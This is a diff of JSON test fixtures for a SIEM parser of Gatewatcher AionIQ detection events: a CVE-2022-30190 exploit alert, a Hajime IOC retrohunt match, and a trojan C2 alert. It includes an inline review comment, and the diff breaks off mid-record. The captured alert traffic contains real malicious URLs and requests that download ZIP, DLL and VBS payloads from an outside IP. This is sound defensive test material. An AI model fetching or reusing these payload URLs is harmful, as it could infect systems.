@@ -1,105 +0,0 @@ -{ - "input": { - "message": "{\"@timestamp\":\"2022-06-03T15:00:20.531Z\",\"detail_wait_time\":18,\"event_type\":\"malware\",\"total_found\":\"3/16\",\"type\":\"malcore\",\"analyzed_clean\":13,\"analyzed_error\":0,\"SHA256\":\"2c36fbcbac3e57df410f6613180fe572015adba62d0f1bd98c13a1535d64703c\",\"dest_port\":49804,\"timestamp\":\"2022-06-03T14:59:08.780474+0000\",\"state\":\"Infected\",\"engine_id\":{\"3\":{\"scan_result\":\"CLEAN\",\"id\":\"312a189607571ec2c7544636be405f10889e73d061e0ed77ca0eca97a470838d\",\"threat_details\":\"\"},\"4\":{\"scan_result\":\"INFECTED\",\"id\":\"32f2f45e6d9faf46e6954356a710208d412fac5181f6c641e34cb9956a133684\",\"threat_details\":\"Win32/Exploit.CVE-2022-30190.A trojan\"},\"6\":{\"scan_result\":\"CLEAN\",\"id\":\"4ca73ae4b92fd7ddcda418e6b70ced0481ac2d878c48e61b686d0c9573c331dc\",\"threat_details\":\"\"},\"10\":{\"scan_result\":\"CLEAN\",\"id\":\"a9b912e461cec506780d8ad8e785cca6b233ad7c72335c262b0a4ab189afa713\",\"threat_details\":\"\"},\"13\":{\"scan_result\":\"CLEAN\",\"id\":\"b14014e40c0e672e050ad9c210a68a5303ce7facabae9eb2ee07ddf97dc0da0e\",\"threat_details\":\"\"},\"2\":{\"scan_result\":\"CLEAN\",\"id\":\"0ff95ddb1117d8f36124f6eac406dbbf9f17e3dd89f9bb1bd600f6ad834c25db\",\"threat_details\":\"\"},\"12\":{\"scan_result\":\"CLEAN\",\"id\":\"af6868a2b87b3388a816e09d2b282629ccf883b763b3691368a27fbd6f6cd51a\",\"threat_details\":\"\"},\"1\":{\"scan_result\":\"INFECTED\",\"id\":\"054a20c51cbe9d2cc7d6a237d6cd4e08ab1a67e170b371e632995766d3ba81af\",\"threat_details\":\"Exploit/HTML.CVE-2022-30190.S1841\"},\"14\":{\"scan_result\":\"CLEAN\",\"id\":\"ecc47e2309be9838d6dc2c5157be1a840950e943f5aaca6637afca11516c3eaf\",\"threat_details\":\"\"},\"9\":{\"scan_result\":\"CLEAN\",\"id\":\"95603b80d80fa3e98b6faf07418a55ed0b035d19209e3ad4f1858f6b46fa070a\",\"threat_details\":\"\"},\"15\":{\"scan_result\":\"CLEAN\",\"id\":\"fe665976a02d03734c321007328109ab66823b260a8eea117d2ab49ee9dfd3f1\",\"threat_details\":\"\"},\"7\":{\"scan_result\":\
"CLEAN\",\"id\":\"527db072abcf877d4bdcd0e9e4ce12c5d769621aa65dd2f7697a3d67de6cc737\",\"threat_details\":\"\"},\"5\":{\"scan_result\":\"SUSPICIOUS\",\"id\":\"3bfeb615a695c5ebaac5ade948ffae0c3cfec3787d4625e3abb27fa3c2867f53\",\"threat_details\":\"HEUR:Exploit.Script.Generic\"},\"0\":{\"scan_result\":\"CLEAN\",\"id\":\"038e407ba285f0e01dd30c6e4f77ec19bad5ed3dc866a2904ae6bf46baa14b74\",\"threat_details\":\"\"},\"8\":{\"scan_result\":\"CLEAN\",\"id\":\"714eca0a6475fe7d2bf9a24bcae343f657b230ff68acd544b019574f1392de77\",\"threat_details\":\"\"},\"11\":{\"scan_result\":\"CLEAN\",\"id\":\"ad05e0dc742bcd6251af91bd07ef470c699d5aebbb2055520b07021b14d7380c\",\"threat_details\":\"\"}},\"detail_threat_found\":\"Infected : Exploit/HTML.CVE-2022-30190.S1841, Win32/Exploit.CVE-2022-30190.A trojan, HEUR:Exploit.Script.Generic\",\"analyzed_suspicious\":1,\"fileinfo\":{\"tx_id\":0,\"magic\":\"HTML document, ASCII text, with very long lines\",\"gaps\":false,\"md5\":\"16e3fcee85f81ec9e9c75dd13fb08c01\",\"sha256\":\"2c36fbcbac3e57df410f6613180fe572015adba62d0f1bd98c13a1535d64703c\",\"file_id\":1,\"sid\":[1100029],\"state\":\"CLOSED\",\"size\":6105,\"stored\":true,\"filename\":\"/exploit.html\"},\"host\":\"network.internal\",\"src_port\":80,\"flow_id\":1686930575880829,\"processing_time\":359,\"file_type_description\":\"Not available\",\"timestamp_analyzed\":\"2022-06-03T15:00:20.531Z\",\"dest_ip\":\"1.2.3.4\",\"reporting_token\":\"No GBOX\",\"severity\":1,\"gcenter\":[\"gcenter-nti.gatewatcher.com\",\"gcenter-nti.gatewatcher.com\"],\"analyzed_other\":0,\"analyzed_infected\":2,\"app_proto\":\"http\",\"detail_scan_time\":341,\"src_ip\":\"9.8.7.6\",\"magic_details\":\"HTML document, ASCII text, with very long lines\",\"proto\":\"TCP\",\"http\":{\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.xmlformats.com\",\"http_content_type\":\"text/html\",\"length\":2485,\"http_user_agent\":\"Mozilla/4.0 (compatible; ms-office; MSOffice 
16)\",\"http_method\":\"GET\",\"url\":\"/exploit.html\",\"status\":200},\"timestamp_detected\":\"2022-06-03T14:59:08.780Z\",\"analyzers_up\":16,\"file_type\":\"Not available\",\"in_iface\":\"monvirt\",\"code\":1,\"engines_last_update_date\":\"2022-06-01T21:22:55Z\",\"gcap\":\"gcap-nti.gatewatcher.com\",\"uuid\":\"73a1884d-94a6-4800-9b08-6daa3281ce8f\"}" - }, - "expected": { - "message": "{\"@timestamp\":\"2022-06-03T15:00:20.531Z\",\"detail_wait_time\":18,\"event_type\":\"malware\",\"total_found\":\"3/16\",\"type\":\"malcore\",\"analyzed_clean\":13,\"analyzed_error\":0,\"SHA256\":\"2c36fbcbac3e57df410f6613180fe572015adba62d0f1bd98c13a1535d64703c\",\"dest_port\":49804,\"timestamp\":\"2022-06-03T14:59:08.780474+0000\",\"state\":\"Infected\",\"engine_id\":{\"3\":{\"scan_result\":\"CLEAN\",\"id\":\"312a189607571ec2c7544636be405f10889e73d061e0ed77ca0eca97a470838d\",\"threat_details\":\"\"},\"4\":{\"scan_result\":\"INFECTED\",\"id\":\"32f2f45e6d9faf46e6954356a710208d412fac5181f6c641e34cb9956a133684\",\"threat_details\":\"Win32/Exploit.CVE-2022-30190.A 
trojan\"},\"6\":{\"scan_result\":\"CLEAN\",\"id\":\"4ca73ae4b92fd7ddcda418e6b70ced0481ac2d878c48e61b686d0c9573c331dc\",\"threat_details\":\"\"},\"10\":{\"scan_result\":\"CLEAN\",\"id\":\"a9b912e461cec506780d8ad8e785cca6b233ad7c72335c262b0a4ab189afa713\",\"threat_details\":\"\"},\"13\":{\"scan_result\":\"CLEAN\",\"id\":\"b14014e40c0e672e050ad9c210a68a5303ce7facabae9eb2ee07ddf97dc0da0e\",\"threat_details\":\"\"},\"2\":{\"scan_result\":\"CLEAN\",\"id\":\"0ff95ddb1117d8f36124f6eac406dbbf9f17e3dd89f9bb1bd600f6ad834c25db\",\"threat_details\":\"\"},\"12\":{\"scan_result\":\"CLEAN\",\"id\":\"af6868a2b87b3388a816e09d2b282629ccf883b763b3691368a27fbd6f6cd51a\",\"threat_details\":\"\"},\"1\":{\"scan_result\":\"INFECTED\",\"id\":\"054a20c51cbe9d2cc7d6a237d6cd4e08ab1a67e170b371e632995766d3ba81af\",\"threat_details\":\"Exploit/HTML.CVE-2022-30190.S1841\"},\"14\":{\"scan_result\":\"CLEAN\",\"id\":\"ecc47e2309be9838d6dc2c5157be1a840950e943f5aaca6637afca11516c3eaf\",\"threat_details\":\"\"},\"9\":{\"scan_result\":\"CLEAN\",\"id\":\"95603b80d80fa3e98b6faf07418a55ed0b035d19209e3ad4f1858f6b46fa070a\",\"threat_details\":\"\"},\"15\":{\"scan_result\":\"CLEAN\",\"id\":\"fe665976a02d03734c321007328109ab66823b260a8eea117d2ab49ee9dfd3f1\",\"threat_details\":\"\"},\"7\":{\"scan_result\":\"CLEAN\",\"id\":\"527db072abcf877d4bdcd0e9e4ce12c5d769621aa65dd2f7697a3d67de6cc737\",\"threat_details\":\"\"},\"5\":{\"scan_result\":\"SUSPICIOUS\",\"id\":\"3bfeb615a695c5ebaac5ade948ffae0c3cfec3787d4625e3abb27fa3c2867f53\",\"threat_details\":\"HEUR:Exploit.Script.Generic\"},\"0\":{\"scan_result\":\"CLEAN\",\"id\":\"038e407ba285f0e01dd30c6e4f77ec19bad5ed3dc866a2904ae6bf46baa14b74\",\"threat_details\":\"\"},\"8\":{\"scan_result\":\"CLEAN\",\"id\":\"714eca0a6475fe7d2bf9a24bcae343f657b230ff68acd544b019574f1392de77\",\"threat_details\":\"\"},\"11\":{\"scan_result\":\"CLEAN\",\"id\":\"ad05e0dc742bcd6251af91bd07ef470c699d5aebbb2055520b07021b14d7380c\",\"threat_details\":\"\"}},\"detail_threat_found\":\"Infected : 
Exploit/HTML.CVE-2022-30190.S1841, Win32/Exploit.CVE-2022-30190.A trojan, HEUR:Exploit.Script.Generic\",\"analyzed_suspicious\":1,\"fileinfo\":{\"tx_id\":0,\"magic\":\"HTML document, ASCII text, with very long lines\",\"gaps\":false,\"md5\":\"16e3fcee85f81ec9e9c75dd13fb08c01\",\"sha256\":\"2c36fbcbac3e57df410f6613180fe572015adba62d0f1bd98c13a1535d64703c\",\"file_id\":1,\"sid\":[1100029],\"state\":\"CLOSED\",\"size\":6105,\"stored\":true,\"filename\":\"/exploit.html\"},\"host\":\"network.internal\",\"src_port\":80,\"flow_id\":1686930575880829,\"processing_time\":359,\"file_type_description\":\"Not available\",\"timestamp_analyzed\":\"2022-06-03T15:00:20.531Z\",\"dest_ip\":\"1.2.3.4\",\"reporting_token\":\"No GBOX\",\"severity\":1,\"gcenter\":[\"gcenter-nti.gatewatcher.com\",\"gcenter-nti.gatewatcher.com\"],\"analyzed_other\":0,\"analyzed_infected\":2,\"app_proto\":\"http\",\"detail_scan_time\":341,\"src_ip\":\"9.8.7.6\",\"magic_details\":\"HTML document, ASCII text, with very long lines\",\"proto\":\"TCP\",\"http\":{\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.xmlformats.com\",\"http_content_type\":\"text/html\",\"length\":2485,\"http_user_agent\":\"Mozilla/4.0 (compatible; ms-office; MSOffice 16)\",\"http_method\":\"GET\",\"url\":\"/exploit.html\",\"status\":200},\"timestamp_detected\":\"2022-06-03T14:59:08.780Z\",\"analyzers_up\":16,\"file_type\":\"Not available\",\"in_iface\":\"monvirt\",\"code\":1,\"engines_last_update_date\":\"2022-06-01T21:22:55Z\",\"gcap\":\"gcap-nti.gatewatcher.com\",\"uuid\":\"73a1884d-94a6-4800-9b08-6daa3281ce8f\"}", - "event": { - "category": [ - "malware" - ], - "kind": "event", - "severity": 1, - "type": [ - "info" - ] - }, - "@timestamp": "2022-06-03T15:00:20.531000Z", - "destination": { - "address": "1.2.3.4", - "ip": "1.2.3.4", - "port": 49804 - }, - "file": { - "hash": { - "md5": "16e3fcee85f81ec9e9c75dd13fb08c01", - "sha256": "2c36fbcbac3e57df410f6613180fe572015adba62d0f1bd98c13a1535d64703c" - }, - "name": "/exploit.html", - 
"size": 6105 - }, - "gatewatcher": { - "event_type": "malware", - "flow_id": "1686930575880829", - "gcap": "gcap-nti.gatewatcher.com", - "gcenter": [ - "gcenter-nti.gatewatcher.com", - "gcenter-nti.gatewatcher.com" - ], - "malcore": { - "code": "1", - "detail_threat_found": "Infected : Exploit/HTML.CVE-2022-30190.S1841, Win32/Exploit.CVE-2022-30190.A trojan, HEUR:Exploit.Script.Generic" - }, - "reporting_token": "No GBOX", - "state": "Infected", - "timestamp_analyzed": "2022-06-03T15:00:20.531Z", - "timestamp_detected": "2022-06-03T14:59:08.780Z", - "type": "malcore" - }, - "http": { - "request": { - "method": "GET" - }, - "response": { - "status_code": 200 - } - }, - "network": { - "protocol": "http", - "transport": "TCP" - }, - "observer": { - "hostname": "network.internal", - "name": "gcap-nti.gatewatcher.com", - "type": "firewall", - "version": "0.2" - }, - "related": { - "hash": [ - "16e3fcee85f81ec9e9c75dd13fb08c01", - "2c36fbcbac3e57df410f6613180fe572015adba62d0f1bd98c13a1535d64703c" - ], - "hosts": [ - "network.internal", - "www.xmlformats.com" - ], - "ip": [ - "1.2.3.4", - "9.8.7.6" - ] - }, - "source": { - "address": "9.8.7.6", - "ip": "9.8.7.6", - "port": 80 - }, - "url": { - "domain": "www.xmlformats.com", - "path": "/exploit.html", - "registered_domain": "xmlformats.com", - "subdomain": "www", - "top_level_domain": "com" - }, - "user_agent": { - "device": { - "name": "Other" - }, - "name": "Outlook", - "original": "Mozilla/4.0 (compatible; ms-office; MSOffice 16)", - "os": { - "name": "Other" - }, - "version": "2016" - } - } -} \ No newline at end of file diff --git a/GateWatcher/aioniq/tests/retrohunt.json b/GateWatcher/aioniq/tests/retrohunt.json new file mode 100644 index 000000000..39f436f31 --- /dev/null +++ b/GateWatcher/aioniq/tests/retrohunt.json 
@@ -0,0 +1,14 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ", + "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c" + } + }, + "message": "{\"external_links\":[{\"url\":\"https://urlhaus.abuse.ch/url/2269068/\",\"source_name\":\"URLHaus Abuse.ch\"}],\"relations\":[\"0e3cc27b-7999-48ce-8484-dc12b325a355\"],\"description\":\"IOC matching first tests\",\"event_type\":\"retrohunt\",\"kill_chain_phases\":[],\"timestamp_detected\":\"2023-06-09T14:08:46.845Z\",\"ioc_type\":\"Host\",\"severity\":1,\"community_id\":\"1:x0uuTl0mYnN1nwngep7+A4VH38I=\",\"ioc_creation_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_countries\":[],\"ioc_value\":\"im.a.very.bad.doma.in\",\"dest_ip\":\"2.2.2.2\",\"vulnerabilities\":[],\"matched_event\":\"bd7686c8-20db-427e-941d-844a5ecfe559\",\"risk\":\"Suspicious\",\"uuid\":\"416f35ad-b954-4b6a-a886-987b826bb7f4\",\"meta_data\":{\"ssdeep\":\"1536:87vbq1lGAXSEYQjbChaAU2yU23M51DjZgSQAvcYkFtZTjzBht5:8D+CAXFYQChaAUk5ljnQssL\",\"cwe\":[],\"descriptions\":[],\"tslh\":\"T16D7312E017B517CC1371A8353BED205E9128223972AE35302E97528DF957703BAB2DBE\",\"filetype\":\"ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux)\",\"size\":78.3984375,\"usageMode\":\"hunting\"},\"flow_id\":841376349480333,\"matched_event_type\":\"alert\",\"ioc_updated_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_platforms\":[\"linux\"],\"signature\":\"RetroHunt - Host - malware/Unknown - Hajime - GW Lab Test - 00100035-1206-2023-cbf5-08330f0d5bc0\",\"ioc_tags\":[\"trojan.generickd.34055387 (b)\",\"linux/hajime.a 
trojan\",\"e32/agent.cd\",\"linux.hajime.bc\",\"backdoor.hajime.linux.129\",\"linux/hajime.75930\",\"unix.malware.agent-6626471-0\",\"linux/hajime.nsnlw\",\"hajime\",\"elf.mirai.43048.gc\",\"trojan.elfarm32.hajime.fbhtfi\",\"trojan.linux.hajime\",\"trojan.generickd.34055387\"],\"@version\":\"1\",\"type\":\"cti\",\"targeted_organizations\":[],\"campaigns\":[],\"categories\":[\"malware\"],\"src_port\":55614,\"gcenter\":\"gcenter-xxxxxxxxxxxxxxxxx.domain.local\",\"case_id\":\"00100035-1206-2023-edb6-b38911f8ba0c\",\"dest_port\":80,\"usage_mode\":\"hunting\",\"timestamp_package\":\"2023-06-12T10:00:35.012874+0000\",\"src_ip\":\"1.1.1.1\",\"ttp\":[],\"tlp\":\"green\",\"probability\":0.5,\"gcap\":\"gcap-xxxxxxxxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-06-12T10:12:39.001Z\",\"timestamp_analyzed\":\"2023-06-12T10:12:39.001Z\",\"families\":[\"Hajime\"],\"ioc_id\":\"00100035-1206-2023-cbf5-08330f0d5bc0\",\"targeted_sectors\":[],\"threat_actor\":[\"GW Lab Test\"],\"matched_app_proto\":\"http\"}" + }, + "expected": { + "message": "{\"external_links\":[{\"url\":\"https://urlhaus.abuse.ch/url/2269068/\",\"source_name\":\"URLHaus Abuse.ch\"}],\"relations\":[\"0e3cc27b-7999-48ce-8484-dc12b325a355\"],\"description\":\"IOC matching first tests\",\"event_type\":\"retrohunt\",\"kill_chain_phases\":[],\"timestamp_detected\":\"2023-06-09T14:08:46.845Z\",\"ioc_type\":\"Host\",\"severity\":1,\"community_id\":\"1:x0uuTl0mYnN1nwngep7+A4VH38I=\",\"ioc_creation_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_countries\":[],\"ioc_value\":\"im.a.very.bad.doma.in\",\"dest_ip\":\"2.2.2.2\",\"vulnerabilities\":[],\"matched_event\":\"bd7686c8-20db-427e-941d-844a5ecfe559\",\"risk\":\"Suspicious\",\"uuid\":\"416f35ad-b954-4b6a-a886-987b826bb7f4\",\"meta_data\":{\"ssdeep\":\"1536:87vbq1lGAXSEYQjbChaAU2yU23M51DjZgSQAvcYkFtZTjzBht5:8D+CAXFYQChaAUk5ljnQssL\",\"cwe\":[],\"descriptions\":[],\"tslh\":\"T16D7312E017B517CC1371A8353BED205E9128223972AE35302E97528DF957703BAB2DBE\",\"filetype\":\"ELF 32-bit 
LSB executable, ARM, EABI5 version 1 (GNU/Linux)\",\"size\":78.3984375,\"usageMode\":\"hunting\"},\"flow_id\":841376349480333,\"matched_event_type\":\"alert\",\"ioc_updated_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_platforms\":[\"linux\"],\"signature\":\"RetroHunt - Host - malware/Unknown - Hajime - GW Lab Test - 00100035-1206-2023-cbf5-08330f0d5bc0\",\"ioc_tags\":[\"trojan.generickd.34055387 (b)\",\"linux/hajime.a trojan\",\"e32/agent.cd\",\"linux.hajime.bc\",\"backdoor.hajime.linux.129\",\"linux/hajime.75930\",\"unix.malware.agent-6626471-0\",\"linux/hajime.nsnlw\",\"hajime\",\"elf.mirai.43048.gc\",\"trojan.elfarm32.hajime.fbhtfi\",\"trojan.linux.hajime\",\"trojan.generickd.34055387\"],\"@version\":\"1\",\"type\":\"cti\",\"targeted_organizations\":[],\"campaigns\":[],\"categories\":[\"malware\"],\"src_port\":55614,\"gcenter\":\"gcenter-xxxxxxxxxxxxxxxxx.domain.local\",\"case_id\":\"00100035-1206-2023-edb6-b38911f8ba0c\",\"dest_port\":80,\"usage_mode\":\"hunting\",\"timestamp_package\":\"2023-06-12T10:00:35.012874+0000\",\"src_ip\":\"1.1.1.1\",\"ttp\":[],\"tlp\":\"green\",\"probability\":0.5,\"gcap\":\"gcap-xxxxxxxxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-06-12T10:12:39.001Z\",\"timestamp_analyzed\":\"2023-06-12T10:12:39.001Z\",\"families\":[\"Hajime\"],\"ioc_id\":\"00100035-1206-2023-cbf5-08330f0d5bc0\",\"targeted_sectors\":[],\"threat_actor\":[\"GW Lab Test\"],\"matched_app_proto\":\"http\"}" + } +} \ No newline at end of file diff --git a/GateWatcher/aioniq/tests/sigflow-alert.json b/GateWatcher/aioniq/tests/sigflow-alert.json new file mode 100644 index 000000000..576a3a270 --- /dev/null +++ b/GateWatcher/aioniq/tests/sigflow-alert.json 
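Review bot: The `expected` object in this fixture holds only the echoed `message`, so the test passes whatever the parser does with the retrohunt event — none of `src_ip`/`dest_ip`, `ioc_value`, `ioc_type`, `risk`, `severity` or `signature` is ever asserted. If the AionIQ parser is meant to normalise these events, pin at least the fields a detection rule keys on, e.g. `"source": {"ip": "1.1.1.1"}`, `"destination": {"ip": "2.2.2.2"}` and `im.a.very.bad.doma.in` under whichever `threat.indicator.*` mapping the parser uses. If retrohunt events are intentionally passed through unparsed, say so in the commit message, since a fixture with no expectations reads as coverage when it is not. The commit record for this GateWatcher change sits outside this chunk, so the intent is inferred.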
@@ -0,0 +1,14 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ", + "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c" + } + }, + "message": "{\"event_type\":\"alert\",\"http\":{\"url\":\"/bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.devyatinskiy.ru\",\"length\":0,\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.690Z\",\"uuid\":\"fd5ba8ea-e263-426d-b4b2-a16521ae09b1\",\"packet_info\":{\"linktype\":1},\"severity\":1,\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"dest_port\":16122,\"@timestamp\":\"2023-03-22T10:44:08.001Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:08.001Z\",\"gcap\":\"gcap-xxxxxxx.domain.local\",\"type\":\"suricata\",\"src_port\":8550,\"metadata\":{\"flowbits\":[\"min.gethttp\",\"ETPROtxtminhead\",\"http.dottedquadhost.dll\"]},\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"app_proto\":\"http\",\"packet\":\"kOK6pqSQkOK6pqSRCABFAAC7Uz1AAEAGPT4py4AkHxzgtiFmPvokcIbSnp074oAYAGsSTgAAAQEICmgi0xNoItMTR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaWFyJTdCNjklN0QgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCg0K\",\"proto\":\"TCP\",\"stream\":1,\"flow\":{\"bytes_toclient\":90364,\"bytes_toserver\":3084,\"pkts_toserver\":19,\"pkts_toclient\":66,\"start\":\"2023-03-22T10:25:55.345216+0000\"},\"tx_id\":5,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"payload\":\"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\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"payload_printable\":\"GET 
/download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000 HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nHost: dc524.4shared.com\\r\\nConnection: Keep-Alive\\r\\nCookie: day1host=h\\r\\n\\r\\nGET /web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nCookie: day1host=h\\r\\nConnection: Keep-Alive\\r\\nHost: cdnfiles.4shared.com\\r\\n\\r\\nGET /a35new/w7.txt HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /a35new/aw7.tiff HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\n\\r\\nGET /bsb/infects/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Windows%207%20Home%20Premium%20%20%20%20=%20%20%20%20%20%20%20N/A HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\n\\r\\n\",\"alert\":{\"signature\":\"ETPRO TROJAN MSIL/Bazidow.A HTTP C2\",\"category\":\"A Network Trojan was 
detected\",\"gid\":1,\"signature_id\":2828821,\"rev\":3,\"severity\":1,\"metadata\":{\"affected_product\":[\"Windows_XP_Vista_7_8_10_Server_32_64_Bit\"],\"performance_impact\":[\"Moderate\"],\"deployment\":[\"Perimeter\"],\"created_at\":[\"2017_12_07\"],\"updated_at\":[\"2022_05_03\"],\"former_category\":[\"MALWARE\"],\"attack_target\":[\"Client_Endpoint\"],\"signature_severity\":[\"Major\"]},\"action\":\"allowed\"}}" + }, + "expected": { + "message": "{\"event_type\":\"alert\",\"http\":{\"url\":\"/bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.devyatinskiy.ru\",\"length\":0,\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.690Z\",\"uuid\":\"fd5ba8ea-e263-426d-b4b2-a16521ae09b1\",\"packet_info\":{\"linktype\":1},\"severity\":1,\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"dest_port\":16122,\"@timestamp\":\"2023-03-22T10:44:08.001Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:08.001Z\",\"gcap\":\"gcap-xxxxxxx.domain.local\",\"type\":\"suricata\",\"src_port\":8550,\"metadata\":{\"flowbits\":[\"min.gethttp\",\"ETPROtxtminhead\",\"http.dottedquadhost.dll\"]},\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"app_proto\":\"http\",\"packet\":\"kOK6pqSQkOK6pqSRCABFAAC7Uz1AAEAGPT4py4AkHxzgtiFmPvokcIbSnp074oAYAGsSTgAAAQEICmgi0xNoItMTR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaWFyJTdCNjklN0QgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCg0K\",\"proto\":\"TCP\",\"stream\":1,\"flow\":{\"bytes_toclient\":90364,\"bytes_toserver\":3084,\"pkts_toserver\":19,\"pkts_toclient\":66,\"start\":\"2023-03-22T10:25:55.345216+0000\"},\"tx_id\":5,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:9
0\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"payload\":\"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\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"payload_printable\":\"GET /download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000 HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nHost: dc524.4shared.com\\r\\nConnection: Keep-Alive\\r\\nCookie: day1host=h\\r\\n\\r\\nGET /web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nCookie: day1host=h\\r\\nConnection: Keep-Alive\\r\\nHost: cdnfiles.4shared.com\\r\\n\\r\\nGET /a35new/w7.txt HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /a35new/aw7.tiff HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\n\\r\\nGET /bsb/infects/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Windows%207%20Home%20Premium%20%20%20%20=%20%20%20%20%20%20%20N/A HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET 